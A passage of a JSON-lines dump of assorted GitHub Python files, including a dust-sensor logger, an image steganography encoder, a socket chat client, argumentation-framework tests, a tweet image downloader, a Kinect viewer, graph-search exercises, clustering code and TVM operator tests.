raise\n\n","repo_name":"Akkarinn/torrents-grabber","sub_path":"torrent_fetcher/http/Request.py","file_name":"Request.py","file_ext":"py","file_size_in_byte":1002,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"24863088232","text":"import serial\nfrom pymongo import MongoClient\nfrom datetime import datetime\nimport time\n\ndb_name = 'dust_sensor'\ncollection_name = 'logs' \nmongo_client = MongoClient()\ndb = mongo_client.get_database(db_name)\nusb_port = '/dev/cu.usbserial-1410'\narduino = serial.Serial(usb_port, 9600, timeout=1)\nwhile True:\n\trawdata = str(arduino.readline())\n\tif('Dust Density' in rawdata):\n\t\tdust_input = rawdata.split(':')\n\t\tinput_db = dust_input[1].split('\\\\')\n\t\tinput_db = input_db[0]\n\t\tcurrent_time = datetime.now()\n\t\tprint(input_db)\n\t\tinsert_date = current_time.strftime('%H:%M:%S %d/%m/%Y')\n\t\tobj = {\n\t\t\t\"time\": insert_date,\n\t\t\t\"density\": str(input_db)\n\t\t}\n\t\tprint(obj)\n\t\tdb[collection_name].insert_one(obj)\n","repo_name":"qngdt/dust-sensor-app","sub_path":"uno_reader/read.py","file_name":"read.py","file_ext":"py","file_size_in_byte":698,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"12390782114","text":"def getDataBits(data):\n bits = []\n for byte in data:\n for b in range(0, 8):\n bits.append((byte >> b) & 0b1)\n return bits\n\n\ndef putDataInsideImage(im, data):\n dataBits = getDataBits(data)\n\n maxX = im.size[0] # width of the image\n maxY = im.size[1] # height of the image\n maxC = len(im.getpixel((0, 0))) # number of channels in the image\n\n x = 0 # x coordinate of the pixel\n y = 0 # y coordinate of the pixel\n c = 0 # color channel of the pixel\n\n for bit in dataBits:\n color = list(im.getpixel((x, y)))\n color[c] = (color[c] & (~0b1)) | bit\n im.putpixel((x, y), tuple(color))\n\n c += 1 # we first iterate through the color channel\n if c >= maxC:\n c = 0\n x = x + 1 # then through the x coordinate\n if x >= maxX:\n x = 0\n y = y + 1 # and finally through the y coordinate\n if y >= maxY:\n print(\"Not enough pixels!\")\n return\n","repo_name":"Habiba1234567/hiding-text-in-an-image","sub_path":"src/encode/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1028,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"44311268992","text":"import socket\n\nHEADERSIZE = 10\n\ns = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\nprint(\"enter your IP and PORT\")\ns.connect((input(),int(input())))\n\nwhile True:\n \n full_msg=\"\"\n \n new_msg = True \n while True:\n msg = s.recv(16)\n if new_msg:\n msg_len = int(msg[:HEADERSIZE])\n new_msg = False\n \n full_msg += msg.decode(\"utf-8\")\n \n if len(full_msg)-HEADERSIZE==msg_len:\n print(\"recieved\")\n print(full_msg[HEADERSIZE:])\n new_msg = True\n full_msg = \"\"\n while True:\n g = input()\n s.send(bytes(f\"{len(g):<{HEADERSIZE}}\"+g,\"utf-8\"))\n","repo_name":"TathagataRoy1278/Controllinator","sub_path":"clien.py","file_name":"clien.py","file_ext":"py","file_size_in_byte":697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"6251987047","text":"from src.bipolar_aba import BipolarABA, Rule, NonBipolarException\nfrom unittest import TestCase\nimport pytest\n\n\nclass TestBipolarABAcreation(TestCase):\n def setUp(self):\n self.assumptions = {'alpha', 'beta', 'gamma', 'delta'}\n self.language = self.assumptions.union({'phi', 'psi', 'chi'})\n self.assumptions_to_contrary_mapping = {'alpha': 'beta', 'beta': 'phi', 'gamma': 'beta', 'delta': 'chi'}\n\n rule_1 = Rule('alpha', 'phi')\n rule_2 = Rule('gamma', 'beta')\n rule_3 = Rule('delta', 'chi')\n rule_4 = Rule('alpha', 'chi')\n\n self.rules = {rule_1, rule_2, rule_3, rule_4}\n\n def test_valid_bipolar_aba_framework_creation(self):\n\n bipolar_aba_framework = BipolarABA(self.language, self.rules, self.assumptions,\n self.assumptions_to_contrary_mapping)\n assert bipolar_aba_framework.language == self.language\n assert bipolar_aba_framework.rules == self.rules\n assert bipolar_aba_framework.assumptions == self.assumptions\n\n def test_framework_creation_with_invalid_rule_head_throws_exception(self):\n\n rule_5 = Rule('alpha', 'psi')\n\n self.rules.add(rule_5)\n\n with pytest.raises(NonBipolarException) as e:\n BipolarABA(self.language, self.rules, self.assumptions, self.assumptions_to_contrary_mapping)\n assert str(e.value) == \"The head of a rule in a BipolarABA framework must be an assumption or \" \\\n \"the contrary of an assumption.\"\n\n def test_framework_creation_with_non_assumption_in_rule_body_throws_exception(self):\n\n rule_5 = Rule('psi', 'gamma')\n\n self.rules.add(rule_5)\n\n with pytest.raises(NonBipolarException) as e:\n BipolarABA(self.language, self.rules, self.assumptions, self.assumptions_to_contrary_mapping)\n assert str(e.value) == \"The body of a rule in a BipolarABA framework can only contain assumptions.\"\n\n def test_assumption_not_in_language_throws_exception(self):\n\n self.assumptions.add('Not in language')\n self.assumptions_to_contrary_mapping['Not in language'] = 'beta'\n\n with pytest.raises(NonBipolarException) as e:\n BipolarABA(self.language, self.rules, self.assumptions, self.assumptions_to_contrary_mapping)\n assert str(e.value) == \"Assumptions and contraries in a BipolarABA framework should be part of the language.\"\n\n def test_mapping_not_total_throws_exception(self):\n\n self.assumptions.add('Not in language')\n\n with pytest.raises(NonBipolarException) as e:\n BipolarABA(self.language, self.rules, self.assumptions, self.assumptions_to_contrary_mapping)\n assert str(e.value) == \"Assumption to contrary mapping must be a total mapping on assumptions.\"\n\n def test_contrary_not_in_language_throws_exception(self):\n\n self.assumptions.add('new')\n self.language.add('new')\n self.assumptions_to_contrary_mapping['new'] = 'Not in language'\n\n with pytest.raises(NonBipolarException) as e:\n BipolarABA(self.language, self.rules, self.assumptions, self.assumptions_to_contrary_mapping)\n assert str(e.value) == \"Assumptions and contraries in a BipolarABA framework should be part of the language.\"\n\n\nclass TestExtensionCalculation(TestCase):\n def setUp(self):\n self.assumptions = {'alpha', 'beta', 'gamma', 'delta'}\n self.language = self.assumptions.union({'phi', 'psi', 'chi'})\n self.assumptions_to_contrary_mapping = {'alpha': 'beta', 'beta': 'phi', 'gamma': 'psi', 'delta': 'chi'}\n\n rule_1 = Rule('alpha', 'phi')\n rule_2 = Rule('gamma', 'beta')\n rule_3 = Rule('delta', 'chi')\n rule_4 = Rule('alpha', 'chi')\n\n self.rules = {rule_1, rule_2, rule_3, rule_4}\n\n self.bipolar_aba_framework = BipolarABA(self.language, self.rules, self.assumptions,\n self.assumptions_to_contrary_mapping)\n\n def test_simple_preferred_extension_calculation(self):\n preferred_extensions = list(self.bipolar_aba_framework.get_preferred_extensions())\n assert {'beta', 'gamma'} in preferred_extensions\n assert {'alpha'} in preferred_extensions\n assert len(preferred_extensions) == 2\n\n def test_simple_set_stable_extension_calculation(self):\n set_stable_extensions = list(self.bipolar_aba_framework.get_set_stable_extensions())\n assert {'alpha'} in set_stable_extensions\n assert len(set_stable_extensions) == 1\n","repo_name":"AminKaramlou/BipolarABASolver","sub_path":"tests/run_on_ci/test_bipolar_aba.py","file_name":"test_bipolar_aba.py","file_ext":"py","file_size_in_byte":4530,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"76"} +{"seq_id":"8018324441","text":"#!/usr/bin/env python3\r\n# -*- coding: utf-8 -*-\r\n\r\nimport tweepy \r\nimport urllib\r\n\r\n\r\n#Twitter API credentials\r\nconsumer_key = \"\"\r\nconsumer_secret = \"\"\r\naccess_key = \"\"\r\naccess_secret = \"\"\r\n\r\n\r\ndef get_all_tweets(account_name):\r\n\r\n #authorization\r\n auth = tweepy.OAuthHandler(consumer_key, consumer_secret)\r\n auth.set_access_token(access_key, access_secret)\r\n api = tweepy.API(auth)\r\n \r\n #get 20 tweets of user\r\n alltweets = []\r\n new_tweets = api.user_timeline(screen_name = account_name,count=20)\r\n alltweets.extend(new_tweets)\r\n\r\n #save user tweets and picture\r\n picSet = []\r\n textSet= []\r\n for status in alltweets:\r\n #text\r\n textSet.append(status.text)\r\n #picture\r\n mediaData = status.entities.get('media',[])\r\n if(len(mediaData) == 0):\r\n picSet.append('')\r\n else: \r\n \tpicSet.append(mediaData[0]['media_url'])\r\n\r\n #print(textSet)\r\n #print(picSet)\r\n\r\n\r\n #download image \r\n index = 0 \r\n cnt = 0\r\n for pic in picSet:\r\n if pic != '':\r\n cnt = cnt+1\r\n urllib.request.urlretrieve(pic,\"./picsTweet/pic%03d.jpg\"%index)\r\n index = index +1 \r\n if cnt == 0:\r\n print(\"No picture in this account!\")\r\n\r\n print(\"Finished Loading!!\") \r\n allSet = []\r\n allSet.append(textSet)\r\n allSet.append(picSet)\r\n return allSet\r\n\r\ndef getUserTwAPI(account_name):\r\n try:\r\n get_all_tweets(account_name)\r\n return(\"success!\")\r\n except Exception:\r\n print(\"The account is invalid!!\")\r\n \r\n \r\n\r\nif __name__ == '__main__': \r\n getUserTwAPI(\"@AnimalPlanet\")\r\n\r\n","repo_name":"BUEC500C1/twitter-summarizer-Bonniesty","sub_path":"getUserTwAPI.py","file_name":"getUserTwAPI.py","file_ext":"py","file_size_in_byte":1676,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"14127427352","text":"import numpy as np\nfrom matplotlib import pyplot as plt\nfrom mpl_toolkits import mplot3d # noqa: F401\n\nimport pyk4a\nfrom pyk4a import Config, PyK4A\n\n\ndef main():\n k4a = PyK4A(\n Config(\n color_resolution=pyk4a.ColorResolution.RES_720P,\n camera_fps=pyk4a.FPS.FPS_5,\n depth_mode=pyk4a.DepthMode.WFOV_2X2BINNED,\n synchronized_images_only=True,\n )\n )\n k4a.start()\n\n # getters and setters directly get and set on device\n k4a.whitebalance = 4500\n assert k4a.whitebalance == 4500\n k4a.whitebalance = 4510\n assert k4a.whitebalance == 4510\n while True:\n capture = k4a.get_capture()\n if np.any(capture.depth) and np.any(capture.color):\n break\n while True:\n capture = k4a.get_capture()\n if np.any(capture.depth) and np.any(capture.color):\n break\n points = capture.depth_point_cloud.reshape((-1, 3))\n colors = capture.transformed_color[..., (2, 1, 0)].reshape((-1, 3))\n\n fig = plt.figure()\n ax = fig.add_subplot(111, projection=\"3d\")\n ax.scatter(\n points[:, 0],\n points[:, 1],\n points[:, 2],\n s=1,\n c=colors / 255,\n )\n ax.set_xlabel(\"x\")\n ax.set_ylabel(\"y\")\n ax.set_zlabel(\"z\")\n ax.set_xlim(-2000, 2000)\n ax.set_ylim(-2000, 2000)\n ax.set_zlim(0, 4000)\n ax.view_init(elev=-90, azim=-90)\n plt.show()\n\n k4a.stop()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"etiennedub/pyk4a","sub_path":"example/viewer_point_cloud.py","file_name":"viewer_point_cloud.py","file_ext":"py","file_size_in_byte":1457,"program_lang":"python","lang":"en","doc_type":"code","stars":276,"dataset":"github-code","pt":"76"} +{"seq_id":"19872637962","text":"# Pranjali Shinde(TA63) - Experiment 1: DFS & BFS\r\n\r\nfrom collections import deque\r\n\r\n\r\ndef main():\r\n numVertices = int(input(\"Enter the number of vertices: \"))\r\n adjacencyMatrix = [[0] * (numVertices + 1) for _ in range(numVertices + 1)]\r\n\r\n for i in range(1, numVertices + 1):\r\n for j in range(1, numVertices + 1):\r\n adjacencyMatrix[i][j] = int(\r\n input(f\"Enter 1 if 'Node {i}' has an edge with 'Node {j}', else enter 0: \"))\r\n\r\n while True:\r\n visited = [0] * (numVertices + 1)\r\n\r\n print(\"\\nMENU\")\r\n print(\"1. Depth First Search (DFS)\")\r\n print(\"2. Breadth First Search (BFS)\")\r\n choice = int(input(\"Enter your choice: \"))\r\n startVertex = int(input(\"Enter the Source Vertex: \"))\r\n\r\n if choice == 1:\r\n depthFirstSearch(adjacencyMatrix, visited,\r\n startVertex, numVertices)\r\n elif choice == 2:\r\n breadthFirstSearch(adjacencyMatrix, startVertex, numVertices)\r\n\r\n cont = input(\"\\nDO YOU WANT TO CONTINUE (Y/N)? \").strip().lower()\r\n if cont != 'y':\r\n break\r\n\r\n\r\ndef depthFirstSearch(adjacencyMatrix, visited, currentVertex, numVertices):\r\n print(currentVertex, end=\" \")\r\n visited[currentVertex] = 1\r\n for i in range(1, numVertices + 1):\r\n if adjacencyMatrix[currentVertex][i] != 0 and visited[i] == 0:\r\n depthFirstSearch(adjacencyMatrix, visited, i, numVertices)\r\n\r\n\r\ndef breadthFirstSearch(adjacencyMatrix, startVertex, numVertices):\r\n visited = [0] * (numVertices + 1)\r\n vertexQueue = deque([startVertex])\r\n visited[startVertex] = 1\r\n\r\n while vertexQueue:\r\n currentVertex = vertexQueue.popleft()\r\n print(currentVertex, end=\" \")\r\n for i in range(1, numVertices + 1):\r\n if adjacencyMatrix[currentVertex][i] != 0 and visited[i] == 0:\r\n visited[i] = 1\r\n vertexQueue.append(i)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"shindepranjal/Artificial-Intelligence","sub_path":"AI_1.py","file_name":"AI_1.py","file_ext":"py","file_size_in_byte":1992,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"3062080076","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Mar 14 12:11:08 2019\r\nThis Module is useed for creating the clusters on the Grid.\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport pandas as pd\r\nimport geopandas as gpd\r\nfrom scipy.spatial import cKDTree\r\nimport itertools\r\n\r\n\r\ndef nearest(df,geom_union,nearest_point,Year,Pop_in_Clus,Flag=False):\r\n btree = cKDTree(geom_union)\r\n dist, idx = btree.query(geom_union,k=nearest_point)\r\n #dist=np.delete(dist,(0),axis=1).ravel()\r\n idx=np.delete(idx,(np.arange(nearest_point-1)),axis=1).ravel()\r\n df1 = pd.DataFrame.from_dict({'nearest_id' : df.loc[idx, 'cluster_id'].values, \"{}{}\".format(Year,'_pop_2'): df.loc[idx, Year+'_pop_1'].values })\r\n df=pd.concat([df,df1],axis=1)\r\n df['Merge_pop']=df[Year+'_pop_1']+df[Year+'_pop_2']\r\n df['clus_near']=df.apply(addcolumn,Year=Year,Pop_in_Clus=Pop_in_Clus,axis=1)\r\n df1=df.groupby('clus_near').size().reset_index(name='count')\r\n df=pd.merge(df,df1,on='clus_near')\r\n if Flag==True:\r\n df=brute_near(df,Year,Pop_in_Clus)\r\n #df['nearest_id']=np.where(df['Merge_pop']<=10000,df['nearest_id'],'NOT')\r\n df['nearest_id']=df.apply(lambda row:row['nearest_id'] if (row['Merge_pop']<=Pop_in_Clus and row['count']==2) else 'NOT',axis=1)\r\n df.drop([Year+'_pop_2','Merge_pop','count','clus_near'],axis=1,inplace=True)\r\n return df\r\n\r\n\r\ndef brute_near(df,Year,Pop_in_Clus):\r\n serviced_cluster=[]\r\n for index in df.index:\r\n if df.at[index,'count']==1 and df.at[index,'Merge_pop']<=Pop_in_Clus and df.at[index,'cluster_id'] not in serviced_cluster:\r\n nearest_point=df.at[index,'nearest_id']\r\n pop_2=df.at[index, Year+'_pop_2']\r\n merge_pop=df.at[index,'Merge_pop']\r\n clus_near=df.at[index,'clus_near']\r\n serviced_cluster.append(df.at[index,'cluster_id'])\r\n df.at[df['cluster_id']==nearest_point, Year+'_pop_2']=pop_2\r\n df.at[df['cluster_id']==nearest_point,'Merge_pop']=merge_pop\r\n df.at[df['cluster_id']==nearest_point,'clus_near']=clus_near\r\n df.at[df['cluster_id']==nearest_point,'nearest_id']=df.at[index,'cluster_id']\r\n serviced_cluster.append(nearest_point)\r\n df.drop('count',axis=1,inplace=True)\r\n df1=df.groupby('clus_near').size().reset_index(name='count')\r\n df1=pd.merge(df,df1,on='clus_near')\r\n return df1\r\n\r\n\r\ndef addcolumn(row,Year,Pop_in_Clus):\r\n if row[Year+'_pop_1']<=Pop_in_Clus and row['nearest_id']!='NOT':\r\n ls=[str(row['cluster_id']),str(row['nearest_id'])]\r\n ls=list(set(itertools.chain.from_iterable(el.split('_') for el in ls)))\r\n ls=list(map(int,ls))\r\n ls.sort()\r\n ls='_'.join(map(str, ls))\r\n return ls\r\n return(str(row['cluster_id']))\r\n\r\ndef Cluster_creation(Malawi_pop,near_point,clus_size,Year, Pop_in_Clus):\r\n Malawi_pop.sort_values('Grid_index',inplace=True)\r\n Malawi_pop.reset_index(drop=True,inplace=True)\r\n Malawi_pop.reset_index(level=0,inplace=True)\r\n Malawi_pop.rename(columns={'index':'cluster_id'},inplace=True)\r\n Malawi_prep=Malawi_pop[['cluster_id','2020_pop_1', '2021_pop_1', '2022_pop_1', '2023_pop_1', 'geometry']]\r\n nearest_point=2\r\n Flag=False\r\n while(Malawi_prep.shape[0]>clus_size and nearest_point<=near_point):\r\n Malawi_prep['Centroid']=Malawi_prep.geometry.centroid\r\n geom_union=list(zip(Malawi_prep.set_geometry('Centroid').geometry.x,Malawi_prep.set_geometry('Centroid').geometry.y))\r\n Malawi_chk=nearest(Malawi_prep,geom_union,nearest_point,Year,Pop_in_Clus,Flag)\r\n Malawi_chk['cluster_id']=Malawi_chk.apply(addcolumn,Year=Year,Pop_in_Clus=Pop_in_Clus,axis=1)\r\n Malawi_chk=Malawi_chk[['geometry', '2020_pop_1', '2021_pop_1', '2022_pop_1','2023_pop_1', 'cluster_id']] \r\n #Malawi_chk['geometry']=Malawi_chk.buffer(0.01)\r\n Malawi_chk=Malawi_chk.dissolve(by='cluster_id',aggfunc='sum',as_index=False) \r\n if Malawi_prep.shape[0]==Malawi_chk.shape[0] and Flag==False:\r\n #nearest_point+=1\r\n Flag=True\r\n continue\r\n elif Malawi_prep.shape[0]==Malawi_chk.shape[0] and Flag==True:\r\n nearest_point+=1\r\n Flag=False\r\n continue\r\n nearest_point=2\r\n Malawi_prep=Malawi_chk\r\n Flag=False\r\n return Malawi_chk\r\n","repo_name":"DialUsers/Dial_CDR","sub_path":"Dial Malawi Analytics Scripts/Phase_2_Scripts/Package/Cluster_Creation.py","file_name":"Cluster_Creation.py","file_ext":"py","file_size_in_byte":4311,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"45559687233","text":"import numpy as np\nimport tvm\nimport topi\nimport topi.testing\nfrom topi.util import get_const_tuple\n\n\ndef test_operator_type_and_tags():\n k = 1\n n = tvm.var('n')\n A = tvm.placeholder((), name='A')\n B = tvm.placeholder((10, 5), name='B')\n B1 = B[0]\n B2 = B[0,0]\n\n assert isinstance(k + n, tvm.expr.Expr)\n assert isinstance(n + n, tvm.expr.Expr)\n assert isinstance(k + A, tvm.tensor.Tensor)\n assert isinstance(A + k, tvm.tensor.Tensor)\n assert isinstance(n + A, tvm.tensor.Tensor)\n assert isinstance(A + n, tvm.tensor.Tensor)\n assert isinstance(A + A, tvm.tensor.Tensor)\n\n assert isinstance(k + B, tvm.tensor.Tensor)\n assert isinstance(B + k, tvm.tensor.Tensor)\n assert isinstance(n + B, tvm.tensor.Tensor)\n assert isinstance(B + n, tvm.tensor.Tensor)\n assert isinstance(A + B, tvm.tensor.Tensor)\n assert isinstance(B + A, tvm.tensor.Tensor)\n assert isinstance(B + B, tvm.tensor.Tensor)\n\n assert (k + B).op.tag == topi.tag.ELEMWISE\n assert (B + k).op.tag == topi.tag.ELEMWISE\n assert (n + B).op.tag == topi.tag.ELEMWISE\n assert (B + n).op.tag == topi.tag.ELEMWISE\n assert (A + B).op.tag == topi.tag.BROADCAST\n assert (B + A).op.tag == topi.tag.BROADCAST\n assert (B + B).op.tag == topi.tag.BROADCAST\n\n assert isinstance(k + B2, tvm.expr.Expr)\n assert isinstance(B2 + k, tvm.expr.Expr)\n assert isinstance(n + B2, tvm.expr.Expr)\n assert isinstance(B2 + n, tvm.expr.Expr)\n assert isinstance(B2 + B2, tvm.expr.Expr)\n assert isinstance(B2 + A, tvm.tensor.Tensor)\n assert isinstance(A + B2, tvm.tensor.Tensor)\n assert isinstance(B2 + B, tvm.tensor.Tensor)\n assert isinstance(B + B2, tvm.tensor.Tensor)\n\n\ndef test_combination():\n k = 3\n n = 5\n m = 10\n x = tvm.var('x')\n A = tvm.placeholder((n, m), name='A')\n B = tvm.placeholder((n, m), name='B')\n C = tvm.placeholder((n, m), name='C')\n D = k + A - B * C / x\n s = tvm.create_schedule(D.op)\n foo = tvm.build(s, [x, A, B, C, D], \"llvm\")\n ctx = tvm.cpu(0)\n x = 2\n a = tvm.nd.array(np.random.uniform(size=(n, m)).astype(A.dtype), ctx)\n b = tvm.nd.array(np.random.uniform(size=(n, m)).astype(B.dtype), ctx)\n c = tvm.nd.array(np.random.uniform(size=(n, m)).astype(C.dtype), ctx)\n d = tvm.nd.array(np.zeros((n, m), dtype=D.dtype), ctx)\n foo(x, a, b, c, d)\n np.testing.assert_allclose(d.asnumpy(), k + a.asnumpy() - b.asnumpy() * c.asnumpy() / x)\n\n\ndef verify_tensor_scalar_bop(shape, typ=\"add\"):\n \"\"\"Verify non-constant Tensor and scalar binary operations.\"\"\"\n sh = [tvm.var('n%d' % i) for i in range(0, len(shape))]\n k = tvm.var('k')\n A = tvm.placeholder(sh, name='A')\n if typ == \"add\":\n B = A + k\n elif typ == \"sub\":\n B = A - k\n elif typ == \"mul\":\n B = A * k\n elif typ == \"div\":\n B = A / k\n else:\n raise NotImplementedError()\n\n def check_device(device):\n ctx = tvm.context(device, 0)\n if not ctx.exist:\n print(\"Skip because %s is not enabled\" % device)\n return\n print(\"Running on target: %s\" % device)\n with tvm.target.create(device):\n s = topi.generic.schedule_elemwise(B)\n\n k_ = 2\n foo = tvm.build(s, [A, B, k] + sh, device, name=\"tensor_scalar_\" + typ)\n a_npy = np.random.uniform(size=shape).astype(A.dtype)\n if typ == \"add\":\n b_npy = a_npy + k_\n elif typ == \"sub\":\n b_npy = a_npy - k_\n elif typ == \"mul\":\n b_npy = a_npy * k_\n elif typ == \"div\":\n b_npy = a_npy / k_\n else:\n raise NotImplementedError()\n\n a_nd = tvm.nd.array(a_npy, ctx)\n b_nd = tvm.nd.array(np.empty(b_npy.shape).astype(B.dtype), ctx)\n foo(a_nd, b_nd, k_, *shape)\n np.testing.assert_allclose(b_nd.asnumpy(), b_npy, rtol=1e-5)\n\n for device in ['llvm', 'cuda', 'opencl', 'metal', 'rocm', 'vulkan']:\n check_device(device)\n\n\ndef verify_broadcast_bop(lhs_shape, rhs_shape, typ=\"add\"):\n A = tvm.placeholder(shape=lhs_shape, name=\"A\")\n B = tvm.placeholder(shape=rhs_shape, name=\"B\")\n if typ == \"add\":\n C = A + B\n elif typ == \"sub\":\n C = A - B\n elif typ == \"mul\":\n C = A * B\n elif typ == \"div\":\n C = A / B\n else:\n raise NotImplementedError()\n\n def check_device(device):\n ctx = tvm.context(device, 0)\n if not ctx.exist:\n print(\"Skip because %s is not enabled\" % device)\n return\n print(\"Running on target: %s\" % device)\n with tvm.target.create(device):\n s = topi.generic.schedule_broadcast(C)\n\n foo = tvm.build(s, [A, B, C], device, name=\"broadcast_binary\" + \"_\" + typ)\n lhs_npy = np.random.uniform(size=lhs_shape).astype(A.dtype)\n rhs_npy = np.random.uniform(size=rhs_shape).astype(A.dtype)\n if typ == \"add\":\n out_npy = lhs_npy + rhs_npy\n elif typ == \"sub\":\n out_npy = lhs_npy - rhs_npy\n elif typ == \"mul\":\n out_npy = lhs_npy * rhs_npy\n elif typ == \"div\":\n rhs_npy = np.abs(rhs_npy) + 0.001\n out_npy = lhs_npy / rhs_npy\n else:\n raise NotImplementedError()\n\n lhs_nd = tvm.nd.array(lhs_npy, ctx)\n rhs_nd = tvm.nd.array(rhs_npy, ctx)\n out_nd = tvm.nd.array(np.empty(out_npy.shape).astype(B.dtype), ctx)\n for _ in range(1):\n foo(lhs_nd, rhs_nd, out_nd)\n np.testing.assert_allclose(out_nd.asnumpy(), out_npy, rtol=1E-4, atol=1E-4)\n\n for device in ['llvm', 'cuda', 'opencl', 'metal', 'rocm', 'vulkan']:\n check_device(device)\n\n\ndef verify_conv2d_scalar_bop(batch, in_size, in_channel, num_filter, kernel, stride, padding, typ=\"add\"):\n def check_device(device):\n ctx = tvm.context(device, 0)\n if not ctx.exist:\n print(\"Skip because %s is not enabled\" % device)\n return\n print(\"Running on target: %s\" % device)\n\n k = 10.0\n with tvm.target.create(device):\n A = tvm.placeholder((batch, in_channel, in_size, in_size), name='A')\n W = tvm.placeholder((num_filter, in_channel, kernel, kernel), name='W')\n B = topi.nn.conv2d(A, W, stride, padding)\n if typ == \"add\":\n C = B + k\n elif typ == \"sub\":\n C = B - k\n elif typ == \"mul\":\n C = B * k\n elif typ == \"div\":\n C = B / k\n else:\n raise NotImplementedError()\n s = topi.generic.schedule_conv2d_nchw([C])\n\n foo = tvm.build(s, [A, W, B, C], device, name=\"conv2d_scalar_\" + typ)\n\n a_npy = np.random.uniform(size=get_const_tuple(A.shape)).astype(A.dtype)\n w_npy = np.random.uniform(size=get_const_tuple(W.shape)).astype(W.dtype)\n b_npy = topi.testing.conv2d_nchw_python(a_npy, w_npy, stride, padding)\n c_npy = np.random.uniform(size=get_const_tuple(B.shape)).astype(B.dtype)\n if typ == \"add\":\n c_npy = b_npy + k\n elif typ == \"sub\":\n c_npy = b_npy - k\n elif typ == \"mul\":\n c_npy = b_npy * k\n elif typ == \"div\":\n c_npy = b_npy / k\n else:\n raise NotImplementedError()\n\n a_nd = tvm.nd.array(a_npy, ctx)\n w_nd = tvm.nd.array(w_npy, ctx)\n b_nd = tvm.nd.array(np.empty(b_npy.shape).astype(B.dtype), ctx)\n c_nd = tvm.nd.array(np.empty(c_npy.shape).astype(C.dtype), ctx)\n foo(a_nd, w_nd, b_nd, c_nd)\n np.testing.assert_allclose(c_nd.asnumpy(), c_npy, rtol=1E-4, atol=1E-4)\n\n for device in ['llvm', 'cuda', 'opencl', 'metal', 'rocm', 'vulkan']:\n check_device(device)\n\n\ndef test_tensor_scalar_bop():\n verify_tensor_scalar_bop((1,), typ=\"add\")\n verify_tensor_scalar_bop((3, 5), typ=\"sub\")\n verify_tensor_scalar_bop((1, 3, 5), typ=\"mul\")\n verify_tensor_scalar_bop((2, 3, 1, 32), typ=\"div\")\n\n\ndef test_broadcast_bop():\n verify_broadcast_bop((2, 3), (), typ=\"add\")\n verify_broadcast_bop((5, 2, 3), (1,), typ=\"add\")\n verify_broadcast_bop((1, 32), (64, 32), typ=\"sub\")\n verify_broadcast_bop((5, 64, 128), (2, 5, 64, 1), typ=\"mul\")\n verify_broadcast_bop((2, 3, 1, 32), (64, 32), typ=\"div\")\n\n\ndef test_conv2d_scalar_bop():\n verify_conv2d_scalar_bop(1, 16, 4, 4, 3, 1, 1, typ=\"add\")\n verify_conv2d_scalar_bop(1, 32, 2, 1, 3, 1, 1, typ=\"sub\")\n verify_conv2d_scalar_bop(1, 32, 1, 1, 3, 1, 1, typ=\"mul\")\n verify_conv2d_scalar_bop(1, 16, 2, 1, 3, 1, 1, typ=\"div\")\n\n\nif __name__ == \"__main__\":\n test_operator_type_and_tags()\n test_combination()\n test_tensor_scalar_bop()\n test_broadcast_bop()\n test_conv2d_scalar_bop()\n","repo_name":"researchmm/tasn","sub_path":"tasn-mxnet/3rdparty/tvm/tests/python/unittest/test_lang_tensor_overload_op.py","file_name":"test_lang_tensor_overload_op.py","file_ext":"py","file_size_in_byte":8715,"program_lang":"python","lang":"en","doc_type":"code","stars":216,"dataset":"github-code","pt":"76"} +{"seq_id":"74112923125","text":"from django.urls import path\nfrom . import views\n\napp_name = \"clientes\"\n\nurlpatterns = [\n path(\"registro/\", views.cliente_registro, name=\"cliente_registro\"),\n path(\"actualizar/\", views.cliente_actualizar, name=\"cliente_actualizar\"),\n path(\"consultas/\", views.consulta_lista, name=\"consulta_list\"),\n path(\"consultas/crear/\", views.consulta_registro, name=\"consulta_create\"),\n path(\"consultas/editar//\", views.consulta_actualizar, name=\"consulta_update\"),\n path(\"consultas/eliminar//\", views.consulta_excluir, name=\"consulta_delete\"), \n path('consultas/generar_informe_clientes_pdf/', views.generar_informe_clientes_pdf, name='generar_informe_clientes_pdf'),\n path(\"consulta/laboratorio/\", views.consulta_laboratorio, name=\"consulta_laboratorio\"), \n]\n","repo_name":"WilliamLex/RESERVASORIGINALFINAL","sub_path":"clientes/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":789,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"42102039310","text":"from itertools import permutations as pmt\ndef calculation(left,right,mathex):\n if mathex == '+':\n result = int(left) + int(right)\n elif mathex == '-':\n result = int(left) - int(right)\n elif mathex == '*':\n result = int(left) * int(right)\n return result\n\ndef solution(expression):\n cals = [\"+\",\"-\",\"*\"]\n perms = list(pmt(cals,3))\n mathBasket = []\n exBasket = []\n myDigit = ''\n answer = 0\n for i in range(len(expression)):\n if i == len(expression) - 1:\n myDigit += expression[i]\n myDigit = int(myDigit)\n mathBasket.append(myDigit)\n elif expression[i].isdigit():\n myDigit += expression[i]\n else:\n myDigit = int(myDigit)\n mathBasket.append(myDigit)\n myDigit = ''\n exBasket.append(expression[i])\n for i in range(6):\n cal = perms[i]\n myExpress = exBasket[:]\n myMath = mathBasket[:]\n for j in range(3):\n mathEx = cal[j]\n while myExpress and mathEx in myExpress:\n idx = myExpress.index(mathEx)\n A = myMath.pop(idx)\n B = myMath.pop(idx)\n C = myExpress.pop(idx)\n result = calculation(A,B,C)\n myMath.insert(idx, result)\n if answer < abs(myMath[0]):\n answer = abs(myMath[0])\n return answer\n\n\n# 다른사람 풀이..\ndef 